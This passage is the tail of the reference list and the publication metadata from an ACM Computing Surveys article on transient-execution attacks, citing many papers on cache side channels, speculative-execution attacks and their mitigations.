Scott Owens, Susmit Sarkar, and Peter Sewell. 2009. A better x86 memory model: x86-TSO. In Proceedings of the International Conference on Theorem Proving in Higher Order Logics. Springer, 391–407.
[111]
Riccardo Paccagnella, Licheng Luo, and Christopher W. Fletcher. 2021. Lord of the ring(s): Side channel attacks on the CPU on-chip ring interconnect are practical. In Proceedings of the 30th USENIX Security Symposium (USENIX Security 21). USENIX Association, 645–662. Retrieved from https://www.usenix.org/conference/usenixsecurity21/presentation/paccagnella.
[112]
Dan Page. 2002. Theoretical use of cache memory as a cryptanalytic side-channel. Cryptology ePrint Archive (2002).
[113]
Shien-Tai Pan, Kimming So, and Joseph T Rahmeh. 1992. Improving the accuracy of dynamic branch prediction using branch correlation. In Proceedings of the 5th International Conference on Architectural Support for Programming Languages and Operating Systems. 76–84.
[114]
D. A. Patterson and J. L. Hennessy. 2017. Computer Organization and Design RISC-V Edition: The Hardware Software Interface. Elsevier Science. Retrieved from 2017935333https://books.google.pt/books?id=x3UnvgAACAAJ.
[115]
Colin Percival. 2005. Cache Missing for Fun and Profit. IRMACS Centre, Simon Fraser University, Burnaby, BC.
[116]
Peter Pessl, Daniel Gruss, Clémentine Maurice, Michael Schwarz, and Stefan Mangard. 2016. DRAMA: Exploiting DRAM addressing for cross-CPU attacks. In Proceedings of the 25th USENIX Security Symposium (USENIX Security 16). USENIX Association, Austin, TX, 565–581. Retrieved from https://www.usenix.org/conference/usenixsecurity16/technical-sessions/presentation/pessl.
[117]
Hernán Ponce-de León and Johannes Kinder. 2022. Cats vs. spectre: An axiomatic approach to modeling speculative execution attacks. In Proceedings of the 2022 IEEE Symposium on Security and Privacy (SP).
[118]
Christopher Pulte, Shaked Flur, Will Deacon, Jon French, Susmit Sarkar, and Peter Sewell. 2017. Simplifying ARM concurrency: Multicopy-atomic axiomatic and operational models for ARMv8. Proceedings of the ACM on Programming Languages 2, POPL, Article 19 (Dec.2017), 29 pages. DOI:
[119]
Antoon Purnal, Furkan Turan, and Ingrid Verbauwhede. 2021. Prime+Scope: Overcoming the observer effect for high-precision cache contention attacks. In Proceedings of the Computer and Communications Security 2021. ACM.
[120]
Zhenxiao Qi, Qian Feng, Yueqiang Cheng, Mengjia Yan, Peng Li, Heng Yin, and Tao Wei. 2021. SpecTaint: Speculative taint analysis for discovering spectre gadgets. In Proceedings of the NDSS.
[121]
M. K. Qureshi. 2018. CEASER: Mitigating conflict-based cache attacks via encrypted-address and remapping. In Proceedings of the 2018 51st Annual IEEE/ACM International Symposium on Microarchitecture (MICRO). 775–787. Retrieved from http://memlab.ece.gatech.edu/papers/MICRO_2018_2.pdf.
[122]
Moinuddin K. Qureshi. 2019. New attacks and defense for encrypted-address cache. In Proceedings of the 46th International Symposium on Computer Architecture (ISCA’19). Association for Computing Machinery, New York, NY, 360–371.
[123]
Joseph Ravichandran, Weon Taek Na, Jay Lang, and Mengjia Yan. 2022. PACMAN: Attacking ARM pointer authentication with speculative execution. In Proceedings of the 49th Annual International Symposium on Computer Architecture. 685–698.
[124]
Xida Ren, Logan Moody, Mohammadkazem Taram, Matthew Jordan, Dean M Tullsen, and Ashish Venkat. 2021. I see dead \(\mu\)ops: Leaking secrets via Intel/AMD micro-op caches. In Proceedings of the 2021 ACM/IEEE 48th Annual International Symposium on Computer Architecture (ISCA). IEEE, 361–374.
[125]
Jordi Ribes-González, Oriol Farràs, Carles Hernández, Vatistas Kostalabros, and Miquel Moretó. 2022. A security model for randomization-based protected caches. Cryptology ePrint Archive (2022).
[126]
RISC-V International, Editors Andrew Waterman and Krste Asanovíc. 2019. The RISC-V Instruction Set Manual, Volume I: User-Level ISA, Document Version 2019121.
[127]
RISC-V International, Editors Andrew Waterman, Krste Asanovíc, and John Hauser. 2021. The RISC-V Instruction Set Manual, Volume II: Privileged Architecture, Document Version 20211203.
[128]
Ryan Roemer, Erik Buchanan, Hovav Shacham, and Stefan Savage. 2012. Return-oriented programming: Systems, languages, and applications. ACM Transactions on Information and System Security (TISSEC) 15, 1 (2012), 1–34.
[129]
Eric Rotenberg, Steve Bennett, and James E Smith. 1996. Trace cache: A low latency approach to high bandwidth instruction fetching. In Proceedings of the 29th Annual IEEE/ACM International Symposium on Microarchitecture. MICRO 29. IEEE, 24–34.
[130]
Gururaj Saileshwar, Christopher W. Fletcher, and Moinuddin Qureshi. 2021. Streamline: A fast, flushless cache covert-channel attack by enabling asynchronous collusion. In Proceedings of the 26th ACM International Conference on Architectural Support for Programming Languages and Operating Systems (ASPLOS 2021). Association for Computing Machinery, New York, NY, 1077–1090. DOI:
[131]
Gururaj Saileshwar and Moinuddin Qureshi. 2021. MIRAGE: Mitigating conflict-based cache attacks with a practical fully-associative design. In Proceedings of the 30th USENIX Security Symposium (USENIX Security 21). USENIX Association. Retrieved from https://www.usenix.org/conference/usenixsecurity21/presentation/saileshwar.
[132]
Gururaj Saileshwar and Moinuddin K. Qureshi. 2019. CleanupSpec: An “Undo” approach to safe speculation. In Proceedings of the 52nd Annual IEEE/ACM International Symposium on Microarchitecture (MICRO’52). Association for Computing Machinery, New York, NY, 73–86. DOI:
[133]
Christos Sakalis, Stefanos Kaxiras, Alberto Ros, Alexandra Jimborean, and Magnus Själander. 2019. Efficient invisible speculative execution through selective delay and value prediction. In Proceedings of the 2019 ACM/IEEE 46th Annual International Symposium on Computer Architecture (ISCA). 723–735.
[134]
Michael Schwarz, Claudio Canella, Lukas Giner, and Daniel Gruss. 2019. Store-to-leak forwarding: Leaking data on meltdown-resistant CPUs. arXiv:1905.05725. Retrieved from https://arxiv.org/abs/1905.05725.
[135]
Michael Schwarz, Moritz Lipp, Daniel Moghimi, Jo Van Bulck, Julian Stecklina, Thomas Prescher, and Daniel Gruss. 2019. ZombieLoad: Cross-privilege-boundary data sampling. In Proceedings of the 2019 ACM SIGSAC Conference on Computer and Communications Security.
[136]
Michael Schwarz, Clémentine Maurice, Daniel Gruss, and Stefan Mangard. 2017. Fantastic timers and where to find them: High-resolution microarchitectural attacks in JavaScript. In Financial Cryptography and Data Security: 21st International Conference, FC 2017, Sliema, Malta, April 3-7, 2017, Revised Selected Papers 21. Springer, 247–267.
[137]
Thomas Unterluggauer Scott Constable. 2021. Seeds of SEED: A side-channel resilient cache skewed by a linear function over a galois field. In Proceedings of the IEEE International Symposium on Secure and Private Execution Environment Design (SEED). IEEE.
[138]
Simha Sethumadhavan, Rajagopalan Desikan, Doug Burger, Charles R Moore, and Stephen W Keckler. 2003. Scalable hardware memory disambiguation for high ILP processors. In Proceedings of the 36th Annual IEEE/ACM International Symposium on Microarchitecture, 2003. MICRO-36. IEEE, 399–410.
[139]
André Seznec. 2007. A 256 kbits l-tage branch predictor. Journal of Instruction-Level Parallelism (JILP) Special Issue: The Second Championship Branch Prediction Competition (CBP-2) 9 (2007), 1–6.
[140]
André Seznec. 2016. TAGE-SC-L branch predictors again. In Proceedings of the 5th JILP Workshop on Computer Architecture Competitions (JWAC-5): Championship Branch Prediction (CBP-5).
[141]
Rami Sheikh and Derek Hower. 2019. Efficient load value prediction using multiple predictors and filters. In Proceedings of the 2019 IEEE International Symposium on High Performance Computer Architecture (HPCA). 454–465. DOI:
[142]
Ming-Wei Shih, Sangho Lee, Taesoo Kim, and Marcus Peinado. 2017. T-SGX: Eradicating controlled-channel attacks against enclave programs. In Network and Distributed System Security Symposium 2017 (NDSS’17) (network and distributed system security symposium 2017 (ndss’17) ed.). Internet Society. Retrieved from https://www.microsoft.com/en-us/research/publication/t-sgx-eradicating-controlled-channel-attacks-enclave-programs/.
[143]
James E Smith. 1998. A study of branch prediction strategies. In Proceedings of the 25 Years of the International Symposia on Computer Architecture (Selected Papers). 202–215.
[145]
Stephan J. Jourdan and John Alan Miller and Namratha Jaisimha. 2001. Return address stack including speculative return address buffer with back pointers. (2001). Patent No. US6898699B2, Filed 21st December, 2001, Issued 24th May, 2005.
[146]
Sam S. Stone, Kevin M. Woley, and Matthew I. Frank. 2005. Address-indexed memory disambiguation and store-to-load forwarding. In Proceedings of the 38th Annual IEEE/ACM International Symposium on Microarchitecture (MICRO’05). IEEE, 12–pp.
[147]
Qinhan Tan, Zhihua Zeng, Kai Bu, and Kui Ren. 2020. PhantomCache: Obfuscating cache conflicts with localized randomization. In Proceedings of the 27th Annual Network and Distributed System Security Symposium, NDSS 2020, San Diego, California, February 23-26, 2020. The Internet Society. Retrieved from https://www.ndss-symposium.org/ndss-paper/phantomcache-obfuscating-cache-conflicts-with-localized-randomization/.
[148]
Mohammadkazem Taram, Ashish Venkat, and Dean Tullsen. 2019. Context-sensitive fencing: Securing speculative execution via microcode customization. In Proceedings of the 24th International Conference on Architectural Support for Programming Languages and Operating Systems (ASPLOS’19). Association for Computing Machinery, New York, NY, 395–410. DOI:
[149]
The Chromium Community. 2018. Mitigating Side-Channel Attacks. Retrieved from https://www.chromium.org/Home/chromium-security/ssca/.
[150]
The Linux Kernel Development Community. 2020. L1D Flushing. Retrieved from https://www.kernel.org/doc/html/latest/admin-guide/hw-vuln/l1d_flush.html.
[151]
The Linux Kernel Development Community. 2018. Microarchitectural Data Sampling (MDS) mitigation. Retrieved from https://www.kernel.org/doc/html/latest/arch/x86/mds.html.
[152]
The Microsoft Edge Team. 2018. Mitigating speculative execution side-channel attacks in Microsoft Edge and Internet Explorer. Retrieved from https://blogs.windows.com/msedgedev/2018/01/03/speculative-execution-mitigations-microsoft-edge-internet-explorer/.
[153]
Enrique F. Torres, Pablo Ibánez, Víctor Viñals, and José María Llabería. 2005. Store buffer design in first-level multibanked data caches. In Proceedings of the 32nd International Symposium on Computer Architecture (ISCA’05). IEEE, 469–480.
[154]
Caroline Trippel, Daniel Lustig, and Margaret Martonosi. 2018. MeltdownPrime and SpectrePrime: Automatically-synthesized attacks exploiting invalidation-based coherence protocols. arXiv:1802.03802. Retrieved from https://arxiv.org/abs/1802.03802.
[155]
Po-An Tsai, Andres Sanchez, Christopher W. Fletcher, and Daniel Sanchez. 2021. Leaking secrets through compressed caches. IEEE Micro 41, 3 (2021), 27–33. DOI:
[156]
Paul Turner. 2018. Retpoline: a software construct for preventing branch-target-injection. Retrieved from https://support.google.com/faqs/answer/7625886.
[157]
Aakash Tyagi, Addison Crump, Ahmad-Reza Sadeghi, Garrett Persyn, Jeyavijayan Rajendran, Patrick Jauernig, and Rahul Kande. 2022. TheHuzz: Instruction fuzzing of processors using golden-reference models for finding software-exploitable vulnerabilities. In Proceedings of the 31st USENIX Security Symposium (USENIX Security 22). USENIX Association, Santa Clara, CA. https://arxiv.org/pdf/2201.09941.pdf.
[158]
Jo Van Bulck, Marina Minkin, Ofir Weisse, Daniel Genkin, Baris Kasikci, Frank Piessens, Mark Silberstein, Thomas F. Wenisch, Yuval Yarom, and Raoul Strackx. 2018. Foreshadow: Extracting the keys to the intel SGX kingdom with transient out-of-order execution. In Proceedings of the 27th USENIX Security Symposium. USENIX Association. See also technical report Foreshadow-NG [168].
[159]
Jo Van Bulck, Daniel Moghimi, Michael Schwarz, Moritz Lipp, Marina Minkin, Daniel Genkin, Yarom Yuval, Berk Sunar, Daniel Gruss, and Frank Piessens. 2020. LVI: Hijacking transient execution through microarchitectural load value injection. In Proceedings of the 41th IEEE Symposium on Security and Privacy (S&P’20).
[160]
Stephan van Schaik, Alyssa Milburn, Sebastian Österlund, Pietro Frigo, Giorgi Maisuradze, Kaveh Razavi, Herbert Bos, and Cristiano Giuffrida. 2019. RIDL: Rogue in-flight data load. In Proceedings of the IEEE Symposium on Security and Privacy.
[161]
Stephan van Schaik, Marina Minkin, Andrew Kwong, Daniel Genkin, and Yuval Yarom. 2021. CacheOut: Leaking data on intel cpus via cache evictions. In Proceedings of the IEEE Symposium on Security and Privacy.
[162]
Jose Rodrigo Sanchez Vicarte, Pradyumna Shome, Nandeeka Nayak, Caroline Trippel, Adam Morrison, David Kohlbrenner, and Christopher W Fletcher. 2021. Opening pandora’s box: A systematic study of new ways microarchitecture can leak private data. In Proceedings of the 2021 ACM/IEEE 48th Annual International Symposium on Computer Architecture (ISCA). IEEE, 347–360.
[163]
Jack Wampler, Ian Martiny, and Eric Wustrow. 2019. ExSpectre: Hiding malware in speculative execution. In 26th Annual Network and Distributed System Security Symposium, NDSS 2019, San Diego, California, USA, February 24-27, 2019. The Internet Society. Retrieved fromhttps://www.ndss-symposium.org/ndss-paper/exspectre-hiding-malware-in-speculative-execution/.
[164]
Yao Wang, Andrew Ferraiuolo, Danfeng Zhang, Andrew C. Myers, and G. Edward Suh. 2016. SecDCP: Secure dynamic cache partitioning for efficient timing channel protection. In Proceedings of the 53rd Annual Design Automation Conference (DAC’16). Association for Computing Machinery, New York, NY, Article 74, 6 pages. DOI:
[165]
Zhenghong Wang and Ruby B Lee. 2006. Covert and side channels due to processor architecture. In Proceedings of the 2006 22nd Annual Computer Security Applications Conference (ACSAC’06). IEEE, 473–482.
[166]
D. Weiss, J.J. Wuu, and V. Chin. 2002. The on-chip 3-MB subarray-based third-level cache on an itanium microprocessor. IEEE Journal of Solid-State Circuits 37, 11 (2002), 1523–1529. DOI:
[167]
Ofir Weisse, Ian Neal, Kevin Loughlin, Thomas F. Wenisch, and Baris Kasikci. 2019. NDA: Preventing speculative execution attacks at their source. In Proceedings of the 52nd Annual IEEE/ACM International Symposium on Microarchitecture. 572–586.
[168]
Ofir Weisse, Jo Van Bulck, Marina Minkin, Daniel Genkin, Baris Kasikci, Frank Piessens, Mark Silberstein, Raoul Strackx, Thomas F. Wenisch, and Yuval Yarom. 2018. Foreshadow-NG: Breaking the virtual memory abstraction with transient out-of-order execution. Technical Report (2018). See also USENIX Security paper Foreshadow [158].
[169]
Mario Werner, Thomas Unterluggauer, Lukas Giner, Michael Schwarz, Daniel Gruss, and Stefan Mangard. 2019. ScatterCache: Thwarting cache attacks via cache set randomization. In Proceedings of the 28th USENIX Security Symposium (USENIX Security 19). USENIX Association, 675–692. Retrieved from https://www.usenix.org/conference/usenixsecurity19/presentation/werner.
[170]
Johannes Wikner, Cristiano Giuffrida, Herbert Bos, and Kaveh Razavi. 2022. Spring: Spectre returning in the browser with speculative load queuing and deep stacks. 16th Workshop on Offensive Technologies (WOOT).
[171]
Nils Wistoff, Moritz Schneider, Frank K Gürkaynak, Gernot Heiser, and Luca Benini. 2022. Systematic prevention of on-core timing channels by full temporal partitioning. IEEE Transactions on Computers (2022). Retrieved from https://arxiv.org/abs/2202.12029.
[172]
You Wu and Xuehai Qian. 2020. ReversiSpec: Reversible coherence protocol for defending transient attacks. arXiv:2006.16535. Retrieved from https://arxiv.org/abs/2006.16535.
[173]
Haocheng Xiao and Sam Ainsworth. 2023. Hacky racers: Exploiting instruction-level parallelism to generate stealthy fine-grained timers. In Proceedings of the 28th ACM International Conference on Architectural Support for Programming Languages and Operating Systems, Volume 2 (ASPLOS 2023). Association for Computing Machinery, New York, NY, 354–369. DOI:
[174]
Wenjie Xiong and Jakub Szefer. 2020. Leaking information through cache LRU states. IEEE International Symposium on High Performance Computer Architecture (HPCA’20), IEEE, 139–152. Retrieved from https://arxiv.org/abs/1905.08348.
[175]
M. Yan, B. Gopireddy, T. Shull, and J. Torrellas. 2017. Secure hierarchy-aware cache replacement policy (SHARP): Defending against cache-based side channel attacks. In Proceedings of the 2017 ACM/IEEE 44th Annual International Symposium on Computer Architecture (ISCA). 347–360. Retrieved from http://iacoma.cs.uiuc.edu/iacoma-papers/isca17_2.pdf.
[176]
M. Yan, R. Sprabery, B. Gopireddy, C. Fletcher, R. Campbell, and J. Torrellas. 2019. Attack directories, not caches: Side channel attacks in a non-inclusive world. In Proceedings of the 2019 IEEE Symposium on Security and Privacy (SP). 888–904. Retrieved from http://iacoma.cs.uiuc.edu/iacoma-papers/ssp19.pdf.
[177]
Yan, Mengjia and Choi, Jiho and Skarlatos, Dimitrios and Morrison, Adam and Fletcher, Christopher and Torrellas, Josep. 2018. InvisiSpec: Making speculative execution invisible in the cache hierarchy. In Proceedings of the 2018 51st Annual IEEE/ACM International Symposium on Microarchitecture (MICRO). 428–441. DOI:
[178]
Fan Yao, Milos Doroslovacki, and Guru Venkataramani. 2018. Are coherence protocol states vulnerable to information leakage?. In Proceedings of the 2018 IEEE International Symposium on High Performance Computer Architecture (HPCA). 168–179. DOI:
[179]
Yuval Yarom and Katrina Falkner. 2014. FLUSH+RELOAD: A high resolution, low noise, L3 cache side-channel attack. In Proceedings of the 23rd USENIX Security Symposium (USENIX Security 14). USENIX Association, San, 719–732. Retrieved from https://www.usenix.org/conference/usenixsecurity14/technical-sessions/presentation/yarom. https://www.usenix.org/system/files/conference/usenixsecurity14/sec14-paper-yarom.pdf.
[180]
Yuval Yarom, Daniel Genkin, and Nadia Heninger. 2016. CacheBleed: A timing attack on OpenSSL constant time RSA. In Proceedings of the CHES. Springer, 346–367. DOI:
[181]
Tse-Yu Yeh and Yale N Patt. 1993. A comparison of dynamic branch predictors that use two levels of branch history. In Proceedings of the 20th Annual International Symposium on Computer Architecture. 257–266.
[182]
Jiyong Yu, Mengjia Yan, Artem Khyzha, Adam Morrison, Josep Torrellas, and Christopher W. Fletcher. 2019. Speculative taint tracking (STT): A comprehensive protection for speculatively accessed data. In Proceedings of the 52nd Annual IEEE/ACM International Symposium on Microarchitecture (MICRO’52). Association for Computing Machinery, New York, NY, 954–968. DOI:
[183]
Sizhuo Zhang, Muralidaran Vijayaraghavan, and Arvind. 2017. Weak memory models: Balancing definitional simplicity and implementation flexibility. In Proceedings of the 2017 26th International Conference on Parallel Architectures and Compilation Techniques (PACT). 288–302. DOI:
[184]
Xingjian Zhang, Ziqi Yuan, Rui Chang, and Yajin Zhou. 2021. Seeds of SEED: H2Cache: Building a hybrid randomized cache hierarchy for mitigating cache side-channel attacks. In Proceedings of the IEEE International Symposium on Secure and Private Execution Environment Design (SEED). IEEE.
[185]
Ziqiao Zhou, Michael K. Reiter, and Yinqian Zhang. 2016. A software approach to defeating side channels in last-level caches. In Proceedings of the 2016 ACM SIGSAC Conference on Computer and Communications Security (CCS’16). Association for Computing Machinery, New York, NY, 871–882. DOI:https://www.cs.unc.edu/ziqiao/papers/ccs2016.pdf.
[186]
Ziqiao Zhou, Michael K. Reiter, and Yinqian Zhang. 2016. A software approach to defeating side channels in last-level caches. In Proceedings of the 2016 ACM SIGSAC Conference on Computer and Communications Security. 871–882.

Index Terms

  1. Transient-Execution Attacks: A Computer Architect Perspective

        Recommendations

        Comments

        Please enable JavaScript to view thecomments powered by Disqus.

        Information & Contributors

        Information

        Published In

        cover image ACM Computing Surveys
        ACM Computing Surveys  Volume 56, Issue 3
        March 2024
        977 pages
        EISSN:1557-7341
        DOI:10.1145/3613568
        Issue’s Table of Contents

        Publisher

        Association for Computing Machinery

        New York, NY, United States

        Publication History

        Published: 06 October 2023
        Online AM: 10 June 2023
        Accepted: 31 May 2023
        Revised: 01 April 2023
        Received: 28 July 2022
        Published in CSUR Volume 56, Issue 3

        Permissions

        Request permissions for this article.

        Check for updates

        Author Tags

        1. Micro-architecture
        2. transient-execution attacks
        3. side-channel analysis

        Qualifiers

        • Tutorial

        Funding Sources

        • National Funds through the Fundação para a Ciência e a Tecnologia (FCT)
        • Instituto de Engenharia de Sistemas e Computadores: Investigação e Desenvolvimento (INESC-ID)
        • European Union, Scaling extreme analYtics with Cross-architecture acceLeration based on OPen Standards (SYCLOPS)
        • FCT, Portugal

        Contributors

        Other Metrics

        Bibliometrics & Citations

        Bibliometrics

        Article Metrics

        • 0
          Total Citations
        • 5,011
          Total Downloads
        • Downloads (Last 12 months)4,383
        • Downloads (Last 6 weeks)216
        Reflects downloads up to 14 Nov 2024

        Other Metrics

        Citations

        View Options

        View options

        PDF

        View or Download as a PDF file.

        PDF

        eReader

        View online with eReader.

        eReader

        Get Access

        Login options

        Full Access

        Media

        Figures

        Other

        Tables

        Share

        Share

        Share this Publication link

        Share on social media